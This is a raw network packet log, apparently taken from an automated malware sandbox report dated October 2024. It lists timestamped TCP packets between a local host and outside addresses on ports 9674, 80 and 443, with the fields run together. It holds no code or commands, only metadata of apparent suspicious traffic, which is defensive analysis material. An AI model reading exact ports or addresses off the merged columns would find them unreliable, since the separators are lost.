                                                                                                                                                                                              Oct 8, 2024 15:37:40.395277977 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395286083 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395294905 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395307064 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395312071 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395323038 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395334959 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395342112 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395363092 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395370007 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395380974 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395402908 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395451069 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395462036 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395473003 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395484924 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395493031 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395517111 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395610094 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395621061 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395637035 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395648003 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395654917 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395665884 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395674944 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395683050 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395694017 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395704031 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395710945 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395720959 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395730019 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395760059 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395771980 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395787001 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395932913 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.395961046 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396074057 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396084070 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396095037 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396105051 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396112919 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396122932 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396132946 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396141052 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396166086 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396222115 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396239042 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396250010 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396260977 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396267891 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396276951 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396286964 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396292925 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396303892 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396313906 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396321058 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396332979 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396339893 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396348953 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396359921 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396369934 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396375895 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.396394968 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.397327900 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.399796009 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476052046 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476079941 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476092100 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476103067 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476114988 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476125956 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476139069 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476151943 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476166964 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476185083 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476196051 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476205111 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476217985 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476224899 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476248026 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476409912 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476422071 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476433039 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476444960 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476454973 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476478100 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476502895 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476512909 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476542950 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476609945 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476620913 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476632118 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476645947 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476650953 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476661921 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476676941 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476682901 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476706982 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476881027 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476892948 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476908922 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476919889 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476928949 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476939917 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476949930 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476959944 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476968050 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476974964 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476983070 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.476994991 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477005005 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477015018 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477022886 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477030993 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477039099 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477051020 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477067947 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477238894 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477251053 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477273941 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477279902 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477289915 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477300882 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477308989 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477335930 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477498055 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477509022 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477519989 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477531910 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477539062 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477549076 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477559090 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477567911 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477582932 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477588892 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477598906 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477608919 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477618933 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477627993 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477637053 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477643967 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477653027 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477664948 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477675915 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477682114 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477704048 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477981091 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.477993011 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.478003025 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.478013992 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.478023052 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.478032112 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.478039026 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.478050947 CEST967449174192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:40.478080034 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:40.489177942 CEST491749674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:41.391164064 CEST8049175178.237.33.50192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:41.391249895 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                              Oct 8, 2024 15:37:41.392555952 CEST8049175178.237.33.50192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:41.392606020 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                              Oct 8, 2024 15:37:44.269979954 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:44.269999027 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:44.270045996 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:44.271486044 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:44.271495104 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:44.866631031 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:44.866692066 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:44.870870113 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:44.870878935 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:44.871161938 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:44.951214075 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:44.991411924 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.179929972 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.179960966 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.179969072 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.180011988 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.180027962 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.180031061 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.180046082 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.180066109 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.180078030 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.180139065 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.180139065 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.180710077 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.203804970 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.203830004 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.203877926 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.203891039 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.203921080 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.244875908 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.244951010 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.245006084 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.245006084 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.245028973 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.254540920 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.291774988 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.291817904 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.291850090 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.291867018 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.291877985 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.291915894 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.293766975 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.293796062 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.293817997 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.293828011 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.293843985 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.296530008 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.296551943 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.296586037 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.296602011 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.296612978 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.357728958 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.357809067 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.357822895 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.357846975 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.357878923 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.380542040 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.380573034 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.380598068 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.380600929 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.380616903 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.380626917 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.381505966 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.381535053 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.381557941 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.381568909 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.381576061 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.381587982 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.381603956 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.381654024 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.382778883 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.382813931 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.382843018 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.382852077 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.382863045 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.384586096 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.384613991 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.384634972 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.384644032 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.384660959 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.385524035 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.385548115 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.385576010 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.385586977 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.385596037 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.404874086 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.411420107 CEST491739674192.168.2.22192.3.101.184
                                                                                                                                                                                              Oct 8, 2024 15:37:45.416515112 CEST967449173192.3.101.184192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.422889948 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.422925949 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.422956944 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.422971964 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.422987938 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.446676016 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.446697950 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.446728945 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.446741104 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.446749926 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.447163105 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.447201967 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.447210073 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.447218895 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.447249889 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.469218016 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.469244003 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.469286919 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.469299078 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.469309092 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.469607115 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.469634056 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.469657898 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.469665051 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.469685078 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.469753027 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.470108032 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.470130920 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.470160007 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.470170021 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.470179081 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.470612049 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.470639944 CEST44349176207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:45.470662117 CEST49176443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:45.470669031 CEST44349176207.241.227.242192.168.2.22
